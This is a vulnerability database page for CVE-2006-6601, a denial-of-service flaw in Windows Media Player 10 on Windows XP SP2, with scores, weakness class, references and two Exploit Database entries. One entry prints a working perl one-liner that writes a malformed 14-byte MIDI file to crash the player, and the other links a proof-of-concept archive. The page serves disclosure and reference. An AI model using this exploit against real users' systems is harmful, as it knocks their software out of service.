CVE-2006-6601 : Detail

CVE-2006-6601

4.05%V3
Network
2006-12-15
21h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29285

Publication date : 2006-12-14 23h00 +00:00
Author : shinnai
EDB Verified : Yes

source: https://www.securityfocus.com/bid/21612/info Multiple applications are prone to a denial-of-service vulnerability. A remote attacker may exploit this vulnerability by presenting malicious 'WMV', 'MID', and 'AVI' files to a victim user. When an affected application processes this image, the application crashes, effectively denying service. It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29285.zip
Exploit Database EDB-ID : 2935

Publication date : 2006-12-14 23h00 +00:00
Author : sehato
EDB Verified : Yes

#!/bin/sh # Windows Media MID File Denial Of Service Vulnerability # Tested: # Windows Media 10.00.00.4036 # Windows XP SP2 # file "example.mid" (Hex-Code): # 4D 54 68 64 00 00 00 06 00 00 00 00 00 00 # File size = 14 byte perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid # milw0rm.com [2006-12-15]

Products Mentioned

Configuraton 0

Windows>>Media_player >> Version 10.00.00.4036

    Microsoft>>Windows_xp >> Version *

    References

    http://www.vupen.com/english/advisories/2006/5039
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/bid/21612
    Tags : vdb-entry, x_refsource_BID